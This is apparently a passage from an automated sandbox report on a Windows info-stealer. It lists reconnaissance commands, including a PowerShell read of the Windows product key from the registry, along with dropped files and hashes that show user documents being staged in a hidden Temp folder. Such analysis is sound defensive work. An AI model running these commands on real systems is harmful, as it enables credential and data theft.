                                                                                    powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                                                    4⤵
                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                    PID:4172
                                                                                • C:\Windows\system32\cmd.exe
                                                                                  C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                                                  3⤵
                                                                                    PID:2264
                                                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                                                      wmic path win32_VideoController get name
                                                                                      4⤵
                                                                                      • Detects videocard installed
                                                                                      PID:720
                                                                                  • C:\Windows\system32\cmd.exe
                                                                                    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                                                                                    3⤵
                                                                                      PID:5080
                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
                                                                                        4⤵
                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                        PID:1124

                                                                                Network

                                                                                MITRE ATT&CK Enterprise v15

                                                                                Replay Monitor

                                                                                Loading Replay Monitor...

                                                                                Downloads

                                                                                • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                                                  Filesize

                                                                                  2KB

                                                                                  MD5

                                                                                  268b890dae39e430e8b127909067ed96

                                                                                  SHA1

                                                                                  35939515965c0693ef46e021254c3e73ea8c4a2b

                                                                                  SHA256

                                                                                  7643d492a6f1e035b63b2e16c9c21d974a77dfd2d8e90b9c15ee412625e88c4c

                                                                                  SHA512

                                                                                  abc4b2ce10a6566f38c00ad55e433791dd45fca47deec70178daf0763578ff019fb0ec70792d5e9ecde4eb6778a35ba8a8c7ecd07550597d9bbb13521c9b98fb

                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                  Filesize

                                                                                  1KB

                                                                                  MD5

                                                                                  912c9a0b4c618a59d75f3f62d89c445b

                                                                                  SHA1

                                                                                  8b7c76a9fe8522544e0c9c1b532adb5cd993aeb9

                                                                                  SHA256

                                                                                  9b62f6617c6db6f029c6700e20a1c3687bb3c63fffed834ec6d1c8b1aed21b85

                                                                                  SHA512

                                                                                  12dfce4c3a0769cf0ccb823b6f297ce1a6228f120d5b14398b2db41809fcaccab62ee520efba2de906622b02408c47fe407838bf196ee331e9f465507ed23d70

                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                  Filesize

                                                                                  1KB

                                                                                  MD5

                                                                                  412622b0b6e439a77e7a88fa117eda31

                                                                                  SHA1

                                                                                  80f56b45a558e6ebba0ffefb9dacbfb16263f1a8

                                                                                  SHA256

                                                                                  de58fcca098bb81b9064ec09cc7e49a7c844ef86ad9abc8ac3571c7d3f378fd6

                                                                                  SHA512

                                                                                  3655d040dead77b208ffaef525c417d11ead12c8f78350bfc55de926dd175f38b42a03c0712cedf95363b2f92525eb57d747e492f3400c1ce0a558ba5a24a32e

                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                  Filesize

                                                                                  1KB

                                                                                  MD5

                                                                                  75a3d3ccd73a7c90b1cee43010838861

                                                                                  SHA1

                                                                                  153a5cfc8f8d3e452716f279d30fffbc85c8cb5b

                                                                                  SHA256

                                                                                  79b4a4cef4637456608fc958aa32d1f0263387cd49b3ae22030e5e0b6c09b977

                                                                                  SHA512

                                                                                  2df25b3b125d6e512f46f9315bab95e6a36cfc2e9ee484c0413b234057c7964b53431d9f3cce37dbe1b0e56e612532b63084fc264e4c15f14064d1f81c791972

                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                  Filesize

                                                                                  1KB

                                                                                  MD5

                                                                                  201a545cca0b0f6d24fbf45bf4ecd1b4

                                                                                  SHA1

                                                                                  d0bce3adf6dce4e74448ae40f00dc524362f9d3f

                                                                                  SHA256

                                                                                  dc276445d733e1a07f07d567b23b5c39605dff9253a2c3875174c44eb3c2cf6d

                                                                                  SHA512

                                                                                  6772780c6718eba43523698dbdbf6d54fb369c26b7198604b9040c75ca7e78e478dd9096bbdb5b7ea230829bf724374d6980cb5c6812bf99bdfcaa96c54e8921

                                                                                • C:\Users\Admin\AppData\Local\Temp\RESC966.tmp

                                                                                  Filesize

                                                                                  1KB

                                                                                  MD5

                                                                                  5240c2529ea121bc62dea1f3c28ca531

                                                                                  SHA1

                                                                                  a1d47a9d0c513edd5e97b924be5f23b387228d9f

                                                                                  SHA256

                                                                                  f171327103cf0768ceee14688cbf5f7f0095d931a249280ac30c3561faf7eac6

                                                                                  SHA512

                                                                                  94c3a175683047688cb42d6cb70fcebb92a597c9f982cd649de1b0b9cfc1cc3d79f9973883ac8689e9778708258901f3d868dfd5ee05ff98c0ee0913a5c32679

                                                                                • C:\Users\Admin\AppData\Local\Temp\_MEI18642\VCRUNTIME140.dll

                                                                                  Filesize

                                                                                  116KB

                                                                                  MD5

                                                                                  be8dbe2dc77ebe7f88f910c61aec691a

                                                                                  SHA1

                                                                                  a19f08bb2b1c1de5bb61daf9f2304531321e0e40

                                                                                  SHA256

                                                                                  4d292623516f65c80482081e62d5dadb759dc16e851de5db24c3cbb57b87db83

                                                                                  SHA512

                                                                                  0da644472b374f1da449a06623983d0477405b5229e386accadb154b43b8b083ee89f07c3f04d2c0c7501ead99ad95aecaa5873ff34c5eeb833285b598d5a655

                                                                                • C:\Users\Admin\AppData\Local\Temp\_MEI18642\_bz2.pyd

                                                                                  Filesize

                                                                                  48KB

                                                                                  MD5

                                                                                  ba8871f10f67817358fe84f44b986801

                                                                                  SHA1

                                                                                  d57a3a841415969051826e8dcd077754fd7caea0

                                                                                  SHA256

                                                                                  9d30387ee07585516f8ce479fcd4e052597835d4149568c1d8382a4a3a0ae7e1

                                                                                  SHA512

                                                                                  8e23b032b785f37b920206fa3064c5fa0e28949f23b2e985fae26c9a355a6bc33dcd380925091f627d4d7936f0958e90fa7c022d89c73db8a1ea6ad267a1a341

                                                                                • C:\Users\Admin\AppData\Local\Temp\_MEI18642\_ctypes.pyd

                                                                                  Filesize

                                                                                  59KB

                                                                                  MD5

                                                                                  e7629e12d646da3be8d60464ad457cef

                                                                                  SHA1

                                                                                  17cf7dacb460183c19198d9bb165af620291bf08

                                                                                  SHA256

                                                                                  eb8affa4e7a4da15c9cda37c68ac8232d885a9d367b28973473949b205384789

                                                                                  SHA512

                                                                                  974ae1607093161a5f33eda9e0a0ade214700d05eb728c8157e7b7589c587cc1cdefe0132d16d31c2941ed4eec4668428564609a0a2ced983c8b13f98a84801b

                                                                                • C:\Users\Admin\AppData\Local\Temp\_MEI18642\_decimal.pyd

                                                                                  Filesize

                                                                                  105KB

                                                                                  MD5

                                                                                  94fbb133e2b93ea55205ecbd83fcae39

                                                                                  SHA1

                                                                                  788a71fa29e10fc9ea771c319f62f9f0429d8550

                                                                                  SHA256

                                                                                  f8e8fbeee7c8454fa42fe47f1da9c63f6b6e631b0dff22c80631f426efcba78b

                                                                                  SHA512

                                                                                  b488f06be28fc8ffd3d8be6b986c7a35ab868198b10943bfa59b9130ebd50354adb9e1818b73ed1f2c92d33d869091e9167346b4430668ca31dd46a845276dea

                                                                                • C:\Users\Admin\AppData\Local\Temp\_MEI18642\_hashlib.pyd

                                                                                  Filesize

                                                                                  35KB

                                                                                  MD5

                                                                                  3c1056edef1c509136160d69d94c4b28

                                                                                  SHA1

                                                                                  e944653161631647a301b3bddc08f8a13a4bf23e

                                                                                  SHA256

                                                                                  41e4bb3c6064cb9e8a62e17056aea19e3d7e6ff1efc17c18d76118ac4e3b7243

                                                                                  SHA512

                                                                                  a03fcf2af6df72923714f66d26774a39e709fa8ad879d72b838d531692231f68480b5ff65b83358ad6b7b411f4ece7028a8613c3b1177acf1d3c933a843ca19a

                                                                                • C:\Users\Admin\AppData\Local\Temp\_MEI18642\_lzma.pyd

                                                                                  Filesize

                                                                                  86KB

                                                                                  MD5

                                                                                  ed348285c1ad1db0effd915c0cb087c3

                                                                                  SHA1

                                                                                  b5b8446d2e079d451c2de793c0f437d23f584f7b

                                                                                  SHA256

                                                                                  fa84770ccf4394d046ed69edaea71957306a25def4986ee6650daf0a2c2d3e43

                                                                                  SHA512

                                                                                  28a4c21bdb0bd697e93b276c184bfc5e317d930c4462e655d9d9ef7487168809ee952e32a856304cdd67a76d6b2286bf94fe9b9de6706c8d36a810aa916ce8e1

                                                                                • C:\Users\Admin\AppData\Local\Temp\_MEI18642\_queue.pyd

                                                                                  Filesize

                                                                                  26KB

                                                                                  MD5

                                                                                  048e8e18d1ae823e666c501c8a8ad1dd

                                                                                  SHA1

                                                                                  63b1513a9f4dfd5b23ec8466d85ef44bfb4a7157

                                                                                  SHA256

                                                                                  7285eef53fd485d6093a9aecbe8fc87c6d70ae4e91d41f382a2a3edff7ebc6c8

                                                                                  SHA512

                                                                                  e57e162d1099b696d11bad172d36824a41fde3dd1d3be0dbd239746f8c87f17e78f889c8ad75ffdac89032b258e6f55f0dab82aae21b9d7ad166ceedfe131b61

                                                                                • C:\Users\Admin\AppData\Local\Temp\_MEI18642\_socket.pyd

                                                                                  Filesize

                                                                                  44KB

                                                                                  MD5

                                                                                  4ee9483c490fa48ee9a09debe0dd7649

                                                                                  SHA1

                                                                                  f9ba6501c7b635f998949cf3568faf4591f21edd

                                                                                  SHA256

                                                                                  9c644a6db56052cf2680476648391b47b603957ffb353ad44a68dac761805ef1

                                                                                  SHA512

                                                                                  c55ddd782cc52d1aba6fd4466ed72387aad4debd3c48315db16aa35d3a5265478d8b197a3a0e0bcf9277004c10b4ccfe8706ab9d0e886d19c0cc4cb406fab4a4

                                                                                • C:\Users\Admin\AppData\Local\Temp\_MEI18642\_sqlite3.pyd

                                                                                  Filesize

                                                                                  57KB

                                                                                  MD5

                                                                                  b8aa2de7df9ba5eab6609dcf07829aa6

                                                                                  SHA1

                                                                                  4b8420c44784745b1e2d2a25bd4174fc3da4c881

                                                                                  SHA256

                                                                                  644669d0875b33aa7e9d3f1856bc8b696f796ad61c7edb9219f8f0ff1a69531a

                                                                                  SHA512

                                                                                  5587efef4c349a137d785594bb7cbffef19fd418bf7d6fb2a4a3e2107354f5f874eeb7e18799031bde335bc65e4ca53f73793a60c67a5482c7e6d1564894ba17

                                                                                • C:\Users\Admin\AppData\Local\Temp\_MEI18642\_ssl.pyd

                                                                                  Filesize

                                                                                  65KB

                                                                                  MD5

                                                                                  a9f1bda7447ab9d69df7391d10290240

                                                                                  SHA1

                                                                                  62a3beb8afc6426f84e737162b3ec3814648fe9f

                                                                                  SHA256

                                                                                  2bb05f7dbd21e67d2a6671411f8ae503dd7538a6767b2169b3033b695557ac13

                                                                                  SHA512

                                                                                  539e94b59093dcf62d6f1a312d9b6aac27873f6416cde050e756e367b9907a8c0e7a31109a433b206bf023436d823d3d945f695cc7291604c0a24bcd27dc1451

                                                                                • C:\Users\Admin\AppData\Local\Temp\_MEI18642\base_library.zip

                                                                                  Filesize

                                                                                  1.3MB

                                                                                  MD5

                                                                                  630153ac2b37b16b8c5b0dbb69a3b9d6

                                                                                  SHA1

                                                                                  f901cd701fe081489b45d18157b4a15c83943d9d

                                                                                  SHA256

                                                                                  ec4e6b8e9f6f1f4b525af72d3a6827807c7a81978cb03db5767028ebea283be2

                                                                                  SHA512

                                                                                  7e3a434c8df80d32e66036d831cbd6661641c0898bd0838a07038b460261bf25b72a626def06d0faa692caf64412ca699b1fa7a848fe9d969756e097cba39e41

                                                                                • C:\Users\Admin\AppData\Local\Temp\_MEI18642\blank.aes

                                                                                  Filesize

                                                                                  110KB

                                                                                  MD5

                                                                                  5a3735ca91c1c8c1a06e93f279fada39

                                                                                  SHA1

                                                                                  0da37688e04f6540fa1370eb90c3b22dd6866433

                                                                                  SHA256

                                                                                  3c5cff8ff19d7dad79b8cc0d6462f890b5659267377f603585e05d2c539a7f2c

                                                                                  SHA512

                                                                                  6008d317557bd51d38a02b3b343a34e375727d83fce897b7aa765fc4c3142efce1a4d4777801a49d34701467dcfaeb2d0abbb712dc4c1addae4f3f0e10f8e2dc

                                                                                • C:\Users\Admin\AppData\Local\Temp\_MEI18642\libcrypto-3.dll

                                                                                  Filesize

                                                                                  1.6MB

                                                                                  MD5

                                                                                  7f1b899d2015164ab951d04ebb91e9ac

                                                                                  SHA1

                                                                                  1223986c8a1cbb57ef1725175986e15018cc9eab

                                                                                  SHA256

                                                                                  41201d2f29cf3bc16bf32c8cecf3b89e82fec3e5572eb38a578ae0fb0c5a2986

                                                                                  SHA512

                                                                                  ca227b6f998cacca3eb6a8f18d63f8f18633ab4b8464fb8b47caa010687a64516181ad0701c794d6bfe3f153662ea94779b4f70a5a5a94bb3066d8a011b4310d

                                                                                • C:\Users\Admin\AppData\Local\Temp\_MEI18642\libffi-8.dll

                                                                                  Filesize

                                                                                  29KB

                                                                                  MD5

                                                                                  08b000c3d990bc018fcb91a1e175e06e

                                                                                  SHA1

                                                                                  bd0ce09bb3414d11c91316113c2becfff0862d0d

                                                                                  SHA256

                                                                                  135c772b42ba6353757a4d076ce03dbf792456143b42d25a62066da46144fece

                                                                                  SHA512

                                                                                  8820d297aeda5a5ebe1306e7664f7a95421751db60d71dc20da251bcdfdc73f3fd0b22546bd62e62d7aa44dfe702e4032fe78802fb16ee6c2583d65abc891cbf

                                                                                • C:\Users\Admin\AppData\Local\Temp\_MEI18642\libssl-3.dll

                                                                                  Filesize

                                                                                  222KB

                                                                                  MD5

                                                                                  264be59ff04e5dcd1d020f16aab3c8cb

                                                                                  SHA1

                                                                                  2d7e186c688b34fdb4c85a3fce0beff39b15d50e

                                                                                  SHA256

                                                                                  358b59da9580e7102adfc1be9400acea18bc49474db26f2f8bacb4b8839ce49d

                                                                                  SHA512

                                                                                  9abb96549724affb2e69e5cb2c834ecea3f882f2f7392f2f8811b8b0db57c5340ab21be60f1798c7ab05f93692eb0aeab077caf7e9b7bb278ad374ff3c52d248

                                                                                • C:\Users\Admin\AppData\Local\Temp\_MEI18642\python312.dll

                                                                                  Filesize

                                                                                  1.8MB

                                                                                  MD5

                                                                                  cbd02b4c0cf69e5609c77dfd13fba7c4

                                                                                  SHA1

                                                                                  a3c8f6bfd7ffe0783157e41538b3955519f1e695

                                                                                  SHA256

                                                                                  ecef0ed97c7b249af3c56cde0bfcae70f66530d716b48b5d94621c3dba8236b5

                                                                                  SHA512

                                                                                  a3760ecaa9736eb24370a0a20dd22a1ee53b3f8002195947bc7d21b239278ec8e26bcc131d0132c530767d1de59954be7946dcf54fcbf2584052c9d9a5615567

                                                                                • C:\Users\Admin\AppData\Local\Temp\_MEI18642\rar.exe

                                                                                  Filesize

                                                                                  615KB

                                                                                  MD5

                                                                                  9c223575ae5b9544bc3d69ac6364f75e

                                                                                  SHA1

                                                                                  8a1cb5ee02c742e937febc57609ac312247ba386

                                                                                  SHA256

                                                                                  90341ac8dcc9ec5f9efe89945a381eb701fe15c3196f594d9d9f0f67b4fc2213

                                                                                  SHA512

                                                                                  57663e2c07b56024aaae07515ee3a56b2f5068ebb2f2dc42be95d1224376c2458da21c965aab6ae54de780cb874c2fc9de83d9089abf4536de0f50faca582d09

                                                                                • C:\Users\Admin\AppData\Local\Temp\_MEI18642\rarreg.key

                                                                                  Filesize

                                                                                  467B

                                                                                  MD5

                                                                                  9795f79ddb61aa29027f4d68496b379c

                                                                                  SHA1

                                                                                  2b28db4d9ac8cffba73048444b1df25346f4ef32

                                                                                  SHA256

                                                                                  e63f3d6710097498085564dfc85add6ed4cf44238c33d20820d2426abcee4e31

                                                                                  SHA512

                                                                                  e44fbbc02da75d173c81bdfda9b14102997609af06fd50c51030430c3c80193dadb632592997361c79b0dfed50ccc0e1743c306a881401a1c78a6a7facb45d4d

                                                                                • C:\Users\Admin\AppData\Local\Temp\_MEI18642\select.pyd

                                                                                  Filesize

                                                                                  25KB

                                                                                  MD5

                                                                                  a71d12c3294b13688f4c2b4d0556abb8

                                                                                  SHA1

                                                                                  13a6b7f99495a4c8477aea5aecc183d18b78e2d4

                                                                                  SHA256

                                                                                  0f3ae1b65102d38f6b33fcbbdadd347aa1b0c09ed8028d4412982b3bd97caf0f

                                                                                  SHA512

                                                                                  ff16cb399b661c170bf79108c62010d32804ead3f6c565b0755a26b62b4f51290bcb71face6cebaa82c0f9b3863aaaa7fa57ddc1e2bbae8598b047d01d15cbe5

                                                                                • C:\Users\Admin\AppData\Local\Temp\_MEI18642\sqlite3.dll

                                                                                  Filesize

                                                                                  630KB

                                                                                  MD5

                                                                                  ce4f27e09044ec688edeaf5cb9a3e745

                                                                                  SHA1

                                                                                  b184178e8a8af7ac1cd735b8e4b8f45e74791ac9

                                                                                  SHA256

                                                                                  f940ff66960441c76a258846d66d4a357e72ad8fbb6bde62b5e5fbe90103b92d

                                                                                  SHA512

                                                                                  bab572324dcf12e71fb6a9648e9224528bd29c75e7d3b978b7068eca0d6f2cb795165756249f47e1db401267b0a1e5fd06c35b6cf5595a013240f9e3444ea083

                                                                                • C:\Users\Admin\AppData\Local\Temp\_MEI18642\unicodedata.pyd

                                                                                  Filesize

                                                                                  295KB

                                                                                  MD5

                                                                                  9a03b477b937d8258ef335c9d0b3d4fa

                                                                                  SHA1

                                                                                  5f12a8a9902ea1dc9bbb36c88db27162aa4901a5

                                                                                  SHA256

                                                                                  4d6e035a366c6f74660f74b8b816add345fa7f1c6cf0793dcf1ed9f91b6ce6a4

                                                                                  SHA512

                                                                                  d3d8bb51474f93d02837580f53aacf5ca9eaf8587e83cddb742c707a251fe86f14e8e665aa4423ac99d74c6c94d95c7df3bfd513b3d5c69661e604f22dcabebe

                                                                                • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_i4osf1b0.kcg.ps1

                                                                                  Filesize

                                                                                  1B

                                                                                  MD5

                                                                                  c4ca4238a0b923820dcc509a6f75849b

                                                                                  SHA1

                                                                                  356a192b7913b04c54574d18c28d46e6395428ab

                                                                                  SHA256

                                                                                  6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

                                                                                  SHA512

                                                                                  4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

                                                                                • C:\Users\Admin\AppData\Local\Temp\nwth3d11\nwth3d11.dll

                                                                                  Filesize

                                                                                  4KB

                                                                                  MD5

                                                                                  891fc590fd6a28aac348b7ad90677548

                                                                                  SHA1

                                                                                  59457ce97774e91fbf01c3ee955d8885a1b08691

                                                                                  SHA256

                                                                                  2da913f02b15a40e51b3ef2dd4ef0e92b3716d2091e3f73a8a38ca0e2593cf9c

                                                                                  SHA512

                                                                                  dbba36c1d17100e913865c9ccb63e8a0b279e0b32bc04c9c6782e3260d6a975fc56e78a0266ea9d4c2b5b3278c35f3d6d8811eb6d33968df58e7e81aad70b081

                                                                                • C:\Users\Admin\AppData\Local\Temp\‌​ ‌‎     \Common Files\Desktop\LimitSearch.jpeg

                                                                                  Filesize

                                                                                  281KB

                                                                                  MD5

                                                                                  57118548eb471639de3a3083f84f9042

                                                                                  SHA1

                                                                                  d3524a6cab11bd68f398737cf74f870cad6a3f26

                                                                                  SHA256

                                                                                  4ef0ceae18af96541c844cd0603db69f392916d64ded379059720a86300ac624

                                                                                  SHA512

                                                                                  f3770060359cfd45523278a37d2b409eaf7e1cf82ebe47d2646e47b9df350f1cdf2bb829f54a798ee63ce6ef3949a803a761e068cb2d0d77e9fece4da4940baa

                                                                                • C:\Users\Admin\AppData\Local\Temp\‌​ ‌‎     \Common Files\Desktop\WaitSend.png

                                                                                  Filesize

                                                                                  318KB

                                                                                  MD5

                                                                                  8fee46f96d52bae3116031cd6d76ae08

                                                                                  SHA1

                                                                                  8da8eb65917f8adb7564042f6b07b8af4c7a47dd

                                                                                  SHA256

                                                                                  82523d27f08c72e09651ddf3572189febc0207dd4beb9fc0b44e37a8030f5589

                                                                                  SHA512

                                                                                  773451f4f12799a95a26fa83b801382894598a8d60d069d0eb4a8ee184469398a08d7006f2e8b2a83ce8a026bdf114ca81c4ec3502b269908de5a71320ccbdb6

                                                                                • C:\Users\Admin\AppData\Local\Temp\‌​ ‌‎     \Common Files\Documents\Are.docx

                                                                                  Filesize

                                                                                  11KB

                                                                                  MD5

                                                                                  a33e5b189842c5867f46566bdbf7a095

                                                                                  SHA1

                                                                                  e1c06359f6a76da90d19e8fd95e79c832edb3196

                                                                                  SHA256

                                                                                  5abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454

                                                                                  SHA512

                                                                                  f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b

                                                                                • C:\Users\Admin\AppData\Local\Temp\‌​ ‌‎     \Common Files\Documents\Files.docx

                                                                                  Filesize

                                                                                  11KB

                                                                                  MD5

                                                                                  4a8fbd593a733fc669169d614021185b

                                                                                  SHA1

                                                                                  166e66575715d4c52bcb471c09bdbc5a9bb2f615

                                                                                  SHA256

                                                                                  714cd32f8edacb3befbfc4b17db5b6eb05c2c8936e3bae14ea25a6050d88ae42

                                                                                  SHA512

                                                                                  6b2ebbbc34cd821fd9b3d7711d9cdadd8736412227e191883e5df19068f8118b7c80248eb61cc0a2f785a4153871a6003d79de934254b2c74c33b284c507a33b

                                                                                • C:\Users\Admin\AppData\Local\Temp\‌​ ‌‎     \Common Files\Documents\Opened.docx

                                                                                  Filesize

                                                                                  11KB

                                                                                  MD5

                                                                                  bfbc1a403197ac8cfc95638c2da2cf0e

                                                                                  SHA1

                                                                                  634658f4dd9747e87fa540f5ba47e218acfc8af2

                                                                                  SHA256

                                                                                  272ed278e82c84cf4f80f48ec7989e1fc35f2055d6d05b63c8a31880846597a6

                                                                                  SHA512

                                                                                  b8938526fcbf7152805aec130ca553e3ec949cb825430a5d0a25c90ec5eb0863857010484a4b31fdc4bb65a4c92ad7127c812b93114be4569a677f60debe43b1

                                                                                • C:\Users\Admin\AppData\Local\Temp\‌​ ‌‎     \Common Files\Documents\Recently.docx

                                                                                  Filesize

                                                                                  11KB

                                                                                  MD5

                                                                                  3b068f508d40eb8258ff0b0592ca1f9c

                                                                                  SHA1

                                                                                  59ac025c3256e9c6c86165082974fe791ff9833a

                                                                                  SHA256

                                                                                  07db44a8d6c3a512b15f1cb7262a2d7e4b63ced2130bc9228515431699191cc7

                                                                                  SHA512

                                                                                  e29624bc8fecb0e2a9d917642375bd97b42502e5f23812195a61a4920cae5b6ed540e74dfcf8432dcceb7de906ad0501cdd68056f9b0ec86a6bb0c1e336bfe32

                                                                                • C:\Users\Admin\AppData\Local\Temp\‌​ ‌‎     \Common Files\Documents\These.docx

                                                                                  Filesize

                                                                                  11KB

                                                                                  MD5

                                                                                  87cbab2a743fb7e0625cc332c9aac537

                                                                                  SHA1

                                                                                  50f858caa7f4ac3a93cf141a5d15b4edeb447ee7

                                                                                  SHA256

                                                                                  57e3b0d22fa619da90237d8bcf8f922b142c9f6abf47efc5a1f5b208c4d3f023

                                                                                  SHA512

                                                                                  6b678f0dd0030806effe6825fd52a6a30b951e0c3dcf91dfd7a713d387aa8b39ec24368e9623c463360acba5e929e268f75ce996526c5d4485894b8ac6b2e0fa

                                                                                • C:\Users\Admin\AppData\Local\Temp\‌​ ‌‎     \Common Files\Downloads\BackupConvertTo.mpg

                                                                                  Filesize

                                                                                  345KB

                                                                                  MD5

                                                                                  f7c643c1104c711ff797ee2b154969ac

                                                                                  SHA1

                                                                                  f49746c762f5304f09113755146918125c8ad4a2

                                                                                  SHA256

                                                                                  d61bf011d804951c8e57fb3f926ba938f4c940f982a2f36efa8fd7eb0f562dd2

                                                                                  SHA512

                                                                                  475efb861cf7a5898c13f3b8baf9131e0dc3e27599bf50331cb49f26ace2ee8dc39ce487a54533442b42c8d28ca1e3123ac4e21103c3d5d582459d7d0eeb90d2

                                                                                • C:\Users\Admin\AppData\Local\Temp\‌​ ‌‎     \Common Files\Downloads\BackupSet.ocx

                                                                                  Filesize

                                                                                  251KB

                                                                                  MD5

                                                                                  d6759dcf8302c1632a0225f5180437f9

                                                                                  SHA1

                                                                                  1884ff2292b797cc1f2006e6086e52304e7efdb1

                                                                                  SHA256

                                                                                  0c4c48c7595e9baebfd548ebe84162a6793b2e14ad1c371736707f988f765cf0

                                                                                  SHA512

                                                                                  331b7a844c6134b115211e77fca56bb6ef6e1be61b1cc70e94f4bfd951c74142887ad8e58c917f0d202349ed2e561c8a0786c3447e25b92ba2293078bdd5a5c3

                                                                                • C:\Users\Admin\AppData\Local\Temp\‌​ ‌‎     \Common Files\Downloads\GrantDisable.csv

                                                                                  Filesize

                                                                                  392KB

                                                                                  MD5

                                                                                  489f56a8785203d69e74dbf7f9e17baf

                                                                                  SHA1

                                                                                  5ef72ec5dc744d60b49718d777f9892e84825b7b

                                                                                  SHA256

                                                                                  75b468c2601df759849644f5419144d87bfefdefb92ba2f0501714aab1fa9ded

                                                                                  SHA512

                                                                                  4cd2575ed926073be058da1d32d2feba74ecad8efdc78d13cbc20e1783d19a0b3b8856c259a36e5839eb53cc8959f9e6f8c6970b1d36b506f2fca94e927dc258

                                                                                • C:\Users\Admin\AppData\Local\Temp\‌​ ‌‎     \Common Files\Pictures\My Wallpaper.jpg

                                                                                  Filesize

                                                                                  24KB

                                                                                  MD5

                                                                                  a51464e41d75b2aa2b00ca31ea2ce7eb

                                                                                  SHA1

                                                                                  5b94362ac6a23c5aba706e8bfd11a5d8bab6097d

                                                                                  SHA256

                                                                                  16d5506b6663085b1acd80644ffa5363c158e390da67ed31298b85ddf0ad353f

                                                                                  SHA512

                                                                                  b2a09d52c211e7100e3e68d88c13394c64f23bf2ec3ca25b109ffb1e1a96a054f0e0d25d2f2a0c2145616eabc88c51d63023cef5faa7b49129d020f67ab0b1ff

                                                                                • C:\Users\Admin\AppData\Local\Temp\‌​ ‌‎     \Common Files\Pictures\PublishMove.jpg

                                                                                  Filesize

                                                                                  864KB

                                                                                  MD5

                                                                                  42b7f6d7249b85a0162f99831db70ab8

                                                                                  SHA1

                                                                                  3e8da95e3d8b94917a201be97b44d2ed42a3ed44

                                                                                  SHA256

                                                                                  f4c2004120200015254369ec5dc1c6c030c5f622ffded855d7a1cd8f52717263

                                                                                  SHA512

                                                                                  3918431dc18209de7839e8f15eafca58d64f4202a76fde847d159c58dbda367df8c7a9bec35cc87542cd4ada235535b2e80142ad1df9b541860ca60128f6275a

                                                                                • C:\Windows\System32\drivers\etc\hosts

                                                                                  Filesize

                                                                                  2KB

                                                                                  MD5

                                                                                  d5371674f26f144bf68f800bb3b80d5a

                                                                                  SHA1

                                                                                  a5ae4e82a6ba9118e28b767d3522c6a3fb0ee582

                                                                                  SHA256

                                                                                  f2ca2cbdec30ce8730436e1bed3c166e005e4742c6a8c931e50e873cdc8ebb03

                                                                                  SHA512

                                                                                  21e068860c0671e54bfd4862735a51d0dc790a737b3f9835f64dafcdb2c0d50bf49b8027d6c43c79ebabf2ac7dcd6be084c613e711fab92a54bb3cfefcb7fb3f

                                                                                • \??\c:\Users\Admin\AppData\Local\Temp\nwth3d11\CSCBD0D024427384C299BA7C176B2D0357A.TMP

                                                                                  Filesize

                                                                                  652B

                                                                                  MD5

                                                                                  02c06cbbada24b30a44fd7995a7464e8

                                                                                  SHA1

                                                                                  e3ba4c526c1f23709f306132f4bebf5cb15ca7b1

                                                                                  SHA256

                                                                                  cd751c8a045051c5eddb4eebbe193e61c58cff237d9d95a816d33b938f6391bb

                                                                                  SHA512

                                                                                  4d0925b426371fc5d7d252fa51ca21d9a9f03e12be88fea2f0e43cdd57af7465c412c09be67e098cc429f564cb08f27d25f90046205e6269054a828062cac5b4

                                                                                • \??\c:\Users\Admin\AppData\Local\Temp\nwth3d11\nwth3d11.0.cs

                                                                                  Filesize

                                                                                  1004B

                                                                                  MD5

                                                                                  c76055a0388b713a1eabe16130684dc3

                                                                                  SHA1

                                                                                  ee11e84cf41d8a43340f7102e17660072906c402

                                                                                  SHA256

                                                                                  8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

                                                                                  SHA512

                                                                                  22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

                                                                                • \??\c:\Users\Admin\AppData\Local\Temp\nwth3d11\nwth3d11.cmdline

                                                                                  Filesize

                                                                                  607B

                                                                                  MD5

                                                                                  192543784977d2de821d4922412027e7

                                                                                  SHA1

                                                                                  280123ca01384d7e6c12ed094dc8d99b1f96e501

                                                                                  SHA256

                                                                                  0e38c737041d09234e7056aaf3e19a9cece5c95616f10eef38eded57c99b4732

                                                                                  SHA512

                                                                                  9a1260b005cbc0298a902b0f766c0ed0ce07ba9fc38cb6246f15784e66aa5a465a05ed5f8e600487865c1457bf45f2c7097e4d592f0e831d88e2335c18a7f350

                                                                                • memory/836-105-0x000002B779940000-0x000002B7799B6000-memory.dmp

                                                                                  Filesize

                                                                                  472KB

                                                                                • memory/836-92-0x00007FFEF0813000-0x00007FFEF0814000-memory.dmp

                                                                                  Filesize

                                                                                  4KB

                                                                                • memory/836-102-0x000002B779830000-0x000002B779932000-memory.dmp

                                                                                  Filesize

                                                                                  1.0MB

